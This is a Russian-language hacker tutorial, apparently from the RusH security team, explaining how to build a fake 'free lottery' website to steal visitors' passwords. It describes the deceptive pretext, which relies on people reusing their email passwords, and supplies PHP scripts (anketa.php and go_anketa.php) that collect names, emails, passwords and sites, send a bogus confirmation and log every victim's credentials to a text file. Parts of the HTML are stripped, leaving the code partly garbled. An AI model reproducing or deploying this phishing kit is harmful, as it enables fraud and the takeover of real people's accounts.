Делаем сайт - ловушку После моих статей про взлом почтовых ящиков с использованием социальной инженерии я получил много отзывов и просьб продолжать данную тему. Это говорит о том что тема социальной инженерии весьма популярна и интересна для многих людей. Что-ж продолжая эту тему я и написал данную статью... Речь в ней пойдет о том как сделать фейковый сайт и с его помощью получать пароли от почты, аськи, сайтов и прочее.... Итак нам необходимо создать сайт на котором пользователь должен регистрироваться, указывая свой логин, пароль, адрес e-mail, адрес сайта, аську и т.п. С моей точки зрения лучшим решением будет проведение электронной лотереи с ценными денежными призами. Падкие до халявы пользователи толпами побегут на ваш сайт, оставляя в логах заветные логины и пароли. Итак всё будет выглядеть так: пользователь попав на сайт видит инфу о проведении бесплатной электронной лотереи... всё что нужно для участия в лотерее - это придумать себе логин и пароль, указать свой почтовый адрес и адрес сайта (если есть). В большинстве случаев придуманый пароль к лотерее совпадет с паролем электронной почты 8). Само собой что никакой лотереи проводится не будет... 8( Приступаем к сайту. Первое и самое важное... необходимо придумать и реализовать красочный дизайн максимально похожий на дизайн серьезных контор. Желательно также прикупить хостинг с доменом первого уровня... либо бесплатный хостинг без рекламы. Наш хостинг также должен поддерживать php т.к. скрипты для анкетирования будут писатся именно на нём. Значит мы прикупили хостинг, придумали дизайн и залили сайт... гуд... приступаем к скриптам. Разместите ссылку на скрипт анкетирования anketa.php =================== anketa.php ===================== Анкета!
Анкета.
# создаем и выводим форму анкетирования
Ф. И. О. : *
Ваш Email : *
Город : *
Ваш пароль : *
Образование : *
Ваша специальность : *
Ваш сайт : *
Ваш стаж работы в интернет :
Другие навыки :
Комментарии :
# копирайты... можно и убрать
Copyright © 2002 Super Lottery.
Ну это просто... хех теперь надо обработать полученные результаты... =================== go_anketa.php ===================== Как же к Вам обращаться, Ваше имя просто необходимо!"; $no_email="Вы указали неверный E-mail адрес!"; $no_adress="Вы забыли указать свой город."; $no_password="Укажите свой пароль."; $no_obrazovanie="Какое у Вас образование?"; $no_spez="Укажите свою рабочую специальность."; $no_site="Укажите ваш сайт."; $no_message="Вы забыли написать сообщение."; ?> $no_name"; } # проверка мыла на правильность ввода if (!eregi("^.+@.+\\..+$",$UserEmail)){ $error2="
  • $no_email
    • "; $result=0; } if ($UserAdress==""){ $result=0; $error3="
  • $no_adress
    • "; } if ($UserPassword==""){ $result=0; $error4="
  • $no_vozrast
    • "; } if ($UserObrazovanie==""){ $result=0; $error5="
  • $no_obrazovanie
    • "; } if ($UserSpez==""){ $result=0; $error6="
  • $no_spez
    • "; } if ($UserSite==""){ $result=0; $error7="
  • $no_rabota
    • "; } # если всё правильно формируем письмо на ящик зарегистрировавшегося пользователя if ($result==1){ $UserMessage = "Здравствуйте $UserName
    Ваша анкета нами получена и принята к рассмотрению.
    "; $UserMessage .= "В самое близжайщее время мы сообщим Вам о результатах анкетирования.
    "; $UserMessage .= "Администратор проекта: $AdminName $AdminEmail"; $from="$SiteName <$AdminEmail>"; $headers="Content-Type: text/html; charset=windows-1251\n"; $headers.="From: $from\nX-Mailer:"; # отсылаем письмо mail($UserEmail, "$ThankYouMessage", $UserMessage, $headers); # формируем данные для себя $AdminMessage = "Данные отправлены от: $UserName\n"; $AdminMessage .= "Email: $UserEmail\n"; $AdminMessage .= "Город: $UserAdress\n"; $AdminMessage .= "Пароль: $UserPassword\n"; $AdminMessage .= "Образование: $UserObrazovanie\n"; $AdminMessage .= "Специальность: $UserSpez\n"; $AdminMessage .= "Сайт: $UserSite\n"; $AdminMessage .= "Стаж в инете: $UserStag\n"; $AdminMessage .= "Другие навыки: $UserNaviki\n"; $AdminMessage .= "Комментарии: \n"; $AdminMessage .= "$UserComments \n"; $AdminMessage .= "$HTTP_USER_AGENT \n"; $AdminMessage .= "\n ================================== \n"; # anketa.txt - файл в котором будут хранится результаты $filename='anketa.txt'; # открываем файл на запись в конец $r=fopen($filename,'a'); # записываем fputs($r,$AdminMessage); fclose($r); echo (" Анкета!
    Поздравляем $UserName!


    Информация прошла успешно

    Обратно


    "); } # если не все параметры были введены... формируем новую форму с указанием ошибок if ($result!==1){ echo (" Неправильные параметры!
    Неправильные параметры данных!

    $UserName
    Пожалуйста повнимательнее заполните анкету!

    $error1$error2$error3$error4$error5$error6$error7
    Анкета.
    Ф. И. О. : *
    Ваш Email : *
    Город : *
    Ваш пароль : *
    Образование : *
    Ваша специальность : *
    Ваш сайт : *
    Ваш стаж работы в интернет:
    Другие навыки :
    Комментарии :


    "); } ?> Теперь заливаем оба файла (anketa.php и go_anketa.php) на сайт и ждём результатов. З.Ы. Спасибо dinggo за идею... 8) Автор: 1dt.w0lf --------------------------------------- RusH security team - http://rst.void.ru